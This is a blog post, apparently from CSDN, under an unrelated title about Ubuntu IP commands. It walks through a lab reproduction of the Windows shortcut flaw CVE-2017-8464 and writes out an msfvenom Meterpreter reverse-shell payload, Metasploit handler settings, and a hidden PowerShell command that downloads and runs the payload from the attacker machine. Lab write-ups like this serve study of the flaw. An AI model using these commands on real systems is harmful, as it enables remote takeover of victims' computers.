ubuntu自动获取ip地址的命令_CVE-2017-8464远程命令执行漏洞复现

最新推荐文章于 2023-07-15 19:42:12 发布
最新推荐文章于 2023-07-15 19:42:12 发布
阅读量154 收藏
点赞数
文章标签: ubuntu自动获取ip地址的命令

7056992fae9bbe5d64c541cc5ef0144d.png

闲来没事翻翻漏洞复现的进程,哎。。。这个漏洞复现还是做了吧,当作自己的笔记与大家分享一下,其实网上有许多这样的文章,本小白只是打着学习漏洞原理来进行漏洞复现。

CVE-2017-8464的漏洞:官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危。这个漏洞影响的版本其实挺多的。

可以远程利用的漏洞版本:

  • Microsoft Windows 10 Version 1607 for 32-bit Systems
  • Microsoft Windows 10 Version 1607 for x64-based Systems
  • Microsoft Windows 10 for 32-bit Systems
  • Microsoft Windows 10 for x64-based Systems
  • Microsoft Windows 10 version 1511 for 32-bit Systems
  • Microsoft Windows 10 version 1511 for x64-based Systems
  • Microsoft Windows 10 version 1703 for 32-bit Systems
  • Microsoft Windows 10 version 1703 for x64-based Systems
  • Microsoft Windows 7 for 32-bit Systems SP1
  • Microsoft Windows 7 for x64-based Systems SP1
  • Microsoft Windows 8.1 for 32-bit Systems
  • Microsoft Windows 8.1 for x64-based Systems
  • Microsoft Windows RT 8.1

服务器系统

  • Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1
  • Microsoft Windows Server 2008 R2 for x64-based Systems SP1
  • Microsoft Windows Server 2008 for 32-bit Systems SP2
  • Microsoft Windows Server 2008 for Itanium-based Systems SP2
  • Microsoft Windows Server 2008 for x64-based Systems SP2
  • Microsoft Windows Server 2012
  • Microsoft Windows Server 2012 R2
  • Microsoft Windows Server 2016

实验环境:

攻击机:Ubuntu

IP地址:192.168.205.138

靶机: Microsoft Windows Server 2008

IP地址:192.168.205.135

注明一下:本打算使用kali2.0作为攻击机,由于出了点小状况,故使用乌班图虚机作为攻击机。

话不多说,拿起工具开始干:

首先,我们现在乌班图虚机中创建一个shell,名称为cmdback.ps1:

执行命令msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.205.138 lport=6666 -f psh-reflection>cmdback.ps1,在网站目录下生成了一个cmdback.ps1的文件:

3fead599b859841afeb5b099bd63ce87.png

访问乌班图中生成的shell文件:

b5eafb60592902b04fb5cc0702b370be.png

启动msf进行设置反弹参数信息:

(1)、输入命令进入 use exploit/multi/handler

指定本机IP set LHOST 192.168.205.138

指定端口 set LPORT 6666

设置返回载荷 set payload windows/x64/meterpreter/reverse_tcp

5e519e33cb5d2eab891206061c9c4730.png

上述工作做完之后,在靶机上面创建posershell.exe的快捷键:

powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.205.138/cmdback.ps1');test.ps1"

e242fe404412954040c4d5fdd6b95fea.png

点击下一步,生成的*.exe文件:

8b6dce0f4cd973fe5811df68c3e401fd.png

93d574135c0316b6e17106a64d1fa8af.png
生成的快捷键

最后我们在攻击机上面输入exploit ,同时在靶机上面运行powershell.exe快捷键:

138d79397a50dd2cc96d406b08da5e93.png
已经获取到靶机的shell

输入shell,成功获取目标主机的权限:

e7c31f6cb93ff00b42ff06aaba88dfb2.png
weixin_39904587
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
hikvision_CVE-2017-7921_auth_bypass_config_decryptor-main.zip
05-20
标题 "hikvision_CVE-2017-7921_auth_bypass_config_decryptor-main.zip" 指向的是一个与海康威视(Hikvision)设备相关的安全漏洞,具体是CVE-2017-7921认证绕过漏洞。这个压缩包可能包含一个工具或指南,用于解析...
黑客-ubuntu下的scapy的ARP攻击(2)
猪也fine的博客
07-03 4276
前一篇文章介绍了如何攻击局域网内主机,让它无法上网http://blog.csdn.net/qq_35315699/article/details/73863632 具体语言是python,有c/c++语言基础的很快就能掌握接下来我们来实让被攻击主机依旧能上网,但数据包要从攻击者主机转发到路由器,这样我们就能获得被攻击者的所有数据包了A机为被攻击主机 i
CVE-2017-8464(震网三代)漏洞分析与
dgjkkhcf的博客
07-22 3895
2017年6月13日,微软官方发布编号为CVE-2017-8464的漏洞公告,官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危。......
CVE-2017-8464震网3.0漏洞分析与
weixin_45484297的博客
03-29 2162
概述:微软在2017年6月份的补丁中修补了一个快捷方式(CVE-2107-8464)的漏洞,公告称此漏洞被国家背景的网络攻击所使用来实施攻击,该漏洞也被称为震网三代,随后Metasploit上发布了该漏洞的PoC。官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危。本次实验主要分为漏洞和poc原理分析两部分,通过实验理清该漏洞可能的的攻击途径以及如何防护。 1.漏洞介绍 该漏洞的原理同2010年美国和以色列入
多种方法在ubuntu系统上查看ip地址
热门推荐
linux_tcpdump的博客
07-15 3万+
这些示例演示了如何使用命令行在Ubuntu系统上获取IP地址。根据你的系统配置和网络接口,IP地址可能会有所不同。在上述示例中,eth0接口的IP地址是192.168.1.10。在上述示例中,eth0接口的IP地址是192.168.1.10。在上述示例中,主机的IP地址是192.168.1.10。
Ubuntu特权提升漏洞(CVE-2021-3493)
Li-D的博客
04-25 3020
漏洞描述 OverlayFS漏洞允许Ubuntu下的本地用户获得root权限。Linux内核中overlayfs文件系统中的Ubuntu特定问题,在该问题中,它未正确验证关于用户名称空间的文件系统功能的应用程序。由于Ubuntu附带了一个允许非特权的overlayfs挂载的补丁,因此本地攻击者可以使用它来获得更高的特权。 影响版本 Ubuntu 20.10 Ubuntu 20.04 LTS Ubuntu 18.04 LTS Ubuntu 16.04 LTS Ubuntu 14.04 ESM
CVE-2017-3506-Poc.zip_CVE-2017-3506_CVE-2017-3506 poc_CVE-2017-3
09-24
**CVE-2017-3506:Apache Struts2远程代码执行漏洞** Apache Struts2是一款广泛使用的开源Web应用框架,它为开发者提供了一种构建基于MVC(Model-View-Controller)模式的Java Web应用程序的方式。在2017年,Apache...
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
hikvision_CVE-2017-7921配置文件解密.rar
05-20
具体影响产品型号,请参考CVE-...CVE-2017-7922漏洞详情。 该程序发布,意在警醒相关单位及时更新相关设备,网络安全需要大家共同监督。 本程序需和配置文件存放在同一目录下运行exe即可配置文件名configurationFile
44913_sale3ho_CVE-2017-12636_POC_
09-30
标题 "44913_sale3ho_CVE-2017-12636_POC_" 提供的信息表明,这是一个与安全漏洞CVE-2017-12636相关的PoC(Proof of Concept)代码。POC通常是由安全研究人员或黑客创建的,用于证明一个特定漏洞确实存在并且可以被...
CVE-2017-8464(震网三代)
小赵同学的博客
01-17 389
CVE-2017-8464(震网三代) 影响版本 windows 10 windwos RT 8.1 windows 8.1 windows 7 windows server 2016 windows server 2012 R2 windows server 2012 windows server 2008 R2 windows server 2008 1. 漏洞利用与 环境: 攻击机kali:192.168.228.128 靶机window10 192.168.228.129 Kali终端输入
震网三代漏洞(CVE-2017-8464)
1匹黑马
02-22 1201
文章目录影响版本危害漏洞原理漏洞任务环境创建EXP获取靶机权限利用Powershell获取权限修建议 影响版本 Windows 7 Windows 8.1 Windows RT 8.1 Windows 10 Windows Server 2008 Windows Server 2008 R2 Windows Server 2012 Windows Server 2012 R2 ...
CVE-2017-8464远程命令执行漏洞(震网漏洞
qq_39627497的博客
12-06 1485
1、 漏洞描述 攻击者可以向用户呈包含恶意的.LNK文件和相关联的恶意二进制文件的可移动驱动器或远程共享。 当用户在Windows资源管理器或解析.LNK文件的任何其他应用程序中打开此驱动器(或远程共享)时,恶意二进制程序将在目标系统上执行攻击者选择的代码,成功利用此漏洞的攻击者可以获得与本地用户相同的用户权限。 注释:.LNK是windows系统内应用程序快捷方式文件的文件类型后缀名。 2、 ...
CVE-2021-3493:Overlay 文件系统 Ubuntu 本地提权漏洞分析
个人笔记
07-02 1635
由于笔者已分析过 CVE-2023-0386,在此基础上,分析 CVE-2021-3493 可能更为简单。CVE-2023-0386 需要理解OverlayFS、Linux 命名空间、SetUID 位的概念;除此之外,如果你想理解 CVE-2021-3493,还需要了解Capability、Linux 文件扩展属性。当你理解了这些常见的概念之后,在手动这些漏洞,会有更加深刻的理解,并且可以提高对 Linux 本地提权漏洞的认知。
MSF之CVE-2017-8464远程命令执行漏洞
极光时流
12-02 3276
MSF之CVE-2017-8464远程命令执行漏洞准备扫描漏洞 准备 实验准备环境: 被攻击机:虚拟机win2008x64位系统,其IP为:192.168.1.107 攻击机:虚拟机kali系统,其IP为:192.168.1.111 攻击工具:kali自带的msfconsole工具 扫描漏洞 在kali终端中输入msfconsole cd 下载/ msfvenom -p windows...
CVE-2017-8464漏洞
我的学习笔记
02-28 1137
感谢学长分享的技术文档,十分感谢。在线免费实验:http://www.hetianlab.com/expc.do?ec=ECIDee9320adea6e0620170831142939000011、资源:http://www.phpstudy.net/a.php/211.html2、本次测试使用了win10和kali最新版。下载安装phpstudy到...
CVE-2017-8464远程命令执行漏洞
u011215939的博客
12-20 1018
CVE-2017-8464远程命令执行漏洞 前言 2017年6月13日,微软官方发布编号为CVE-2017-8464的漏洞公告,官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危 漏洞描述 攻击者可以向用户呈包含恶意的.LNK文件和相关联的恶意二进制文件的可移动驱动器或远程共享。 当用
CVE-2017-8464(远程执行命令)漏洞
RongChun的博客
01-04 1058
漏洞: 利用原理: 创建恶意快捷方式,包含恶意执行脚本,点击恶意快捷方式,导致本机中病毒。 漏洞影响范围: • Microsoft Windows 10 Version 1607 for 32-bit Systems • Microsoft Windows 10 Version 1607 for x64-based Systems • Microsoft Windows 10 for 32-b...
[Shell]CVE-2017-8464漏洞
baguangman5501的博客
09-01 322
0x01 漏洞原理 Windows系统通过解析 .LNK 后缀文件时,是使用二进制来解析的,而当恶意的二进制代码被系统识别执行的时候就可以实远程代码执行,由于是在explorer.exe进程中运行的,所以load进内存的时候与当前用户具有相同的权限。 于是攻击者利用这一解析过程的漏洞,将包含恶意二进制的代码被附带进可移动驱动器(或远程共享过程中),受害者使用powershell解析 ....
Tomact_CVE-2020-1938漏洞
最新发布
08-31
Tomact_CVE-2020-1938漏洞,可以按照以下步骤进行操作: 1. 下载POC:可以使用以下命令下载POC文件: git clone https://github.com/sv3nbeast/CVE-2020-1938-Tomact-file_include-file_read/ 2. 在攻击机上...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值